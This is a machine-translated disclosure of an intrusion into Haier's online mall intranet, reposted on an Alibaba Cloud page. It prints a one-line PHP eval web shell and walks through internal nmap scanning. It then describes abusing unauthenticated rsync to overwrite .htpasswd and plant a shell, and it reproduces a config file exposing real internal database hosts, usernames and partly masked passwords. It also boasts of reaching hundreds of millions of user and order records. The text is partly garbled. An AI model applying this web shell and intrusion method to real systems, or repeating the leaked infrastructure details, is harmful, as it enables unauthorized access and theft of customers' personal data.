Home > Cloud Computing > Cloud Security

A problem left by Haier leads to access to the primary store of the mall and Solutions

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

A problem left by Haier leads to access to the primary store of the mall and Solutions

Leakage of mall users and order libraries can be caused by a legacy problem of Haier accessing the Intranet and weak Intranet protection.

Http://zixun.ehaier.com/build for wordpress

A backdoor is successfully found for Matching Common getshell features in batches.

Http://zixun.ehaier.com/wp-content/themes/radius/404.php
 

Backdoor Creation Time: 13-7-21

<?php @eval($_POST['pass']);?>

Typical php sentence

It is easy to find

uname -aLinux zixun-01.hst.ehaieridc.net 2.6.18-128.el5xen #1 SMP Wed Dec 17 12:01:40 EST 2008 x86_64 x86_64 x86_64 GNU/Linux



If the kernel version is older, you can directly escalate permissions.
 

 

Analyze the basic network structure
 

It is found that the basic communication is performed in the 10.9.10.1/24 network segment.

Nmap has been installed on the local machine, and nmap is used to perform basic scanning of c segments.

After filtering, it is found that rsync is enabled for unauthorized access in 10.9.10.135.



401 authentication enabled for web Access 10.9.10.135

Because rsync can be written to download. htpasswd and then add a user test: 123456

Login successful.

Then, synchronize a shell to getshell.
 

 


During login, we found that this web function is to collect website data, including users, orders, and visits.

Guess that there are key files connected to the database

Search for the configuration file, find main_pro.php, and find many database configurations.

'db'=>array('class' => 'CDbConnection', 'connectionString' => 'mysql:host=10.9.10.61;dbname=db_mnt','emulatePrepare' => true,'username' => 'imgfilter','password' => '*********','charset' => 'utf8','tablePrefix' => '',),'db_mobile_mnt'=>array('class' => 'CDbConnection', 'connectionString' => 'mysql:host=my-cps-wrt.vip.ehaieridc.net;dbname=db_mobile_mnt','emulatePrepare' => true,'username' => 'report','password' => '*********','charset' => 'utf8','tablePrefix' => '',),'db_analysis' =>array('class' => 'CDbConnection', 'connectionString' => 'mysql:host=my-cps-wrt.vip.ehaieridc.net;dbname=ehaier_analysis_db','emulatePrepare' => true,'username' => 'report','password' => '*********','charset' => 'utf8','tablePrefix' => 'tbl_',),'data_analysis' =>array('class' => 'CDbConnection', 'connectionString' => 'mysql:host=my-cps-wrt.vip.ehaieridc.net;dbname=data_analysis','emulatePrepare' => true,'username' => 'report','password' => '*********','charset' => 'utf8','tablePrefix' => '',),'db_shop' =>array('class' => 'CDbConnection', 'connectionString' => 'mysql:host=my-www-rnd.vip.ehaieridc.net;dbname=Shop','emulatePrepare' => true,'username' => 'pec','password' => '*********','charset' => 'utf8','tablePrefix' => '',),'db_shopattributes' =>array('class' => 'CDbConnection', 'connectionString' => 'mysql:host=my-www-rnd.vip.ehaieridc.net;dbname=ShopAttributes','emulatePrepare' => true,'username' => 'pec','password' => '*********','charset' => 'utf8','tablePrefix' => '',),'db_stock' =>array('class' => 'CDbConnection', 'connectionString' => 'mysql:host=my-cbs-rnd.vip.ehaieridc.net;dbname=db_stock','emulatePrepare' => true,'username' => 'cbs_stock_ro','password' => '**********D)(]*********[zdF','charset' => 'utf8','tablePrefix' => '',),'db_eis' =>array('class' => 'CDbConnection', 'connectionString' => 'mysql:host=my-cbs-wrt.vip.ehaieridc.net;dbname=db_eis','emulatePrepare' => true,'username' => 'cbs_eis_ser','password' => 'cBs*{*********','charset' => 'utf8','tablePrefix' => '',),'db_mobile' =>array('class' => 'CDbConnection', 'connectionString' => 'mysql:host=my-shop-rnd.vip.ehaieridc.net;dbname=m_shop','emulatePrepare' => true,'username' => 'm_shop_ro','password' => '*********','charset' => 'utf8','tablePrefix' => '',),







Connect 'connectionstring' => 'mysql: host = my-www-rnd.vip.ehaieridc.net; dbname = shop ',

Database
 




 

473 million users

In order to verify that the database is online, I registered an account and found it in the database.
 

 



Order
 

 





Hackers intrude into the Intranet. This is simply because they do not need to be further penetrated.
 

Solution:

Boundary Security

Regular server Health Check

Secure Intranet

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More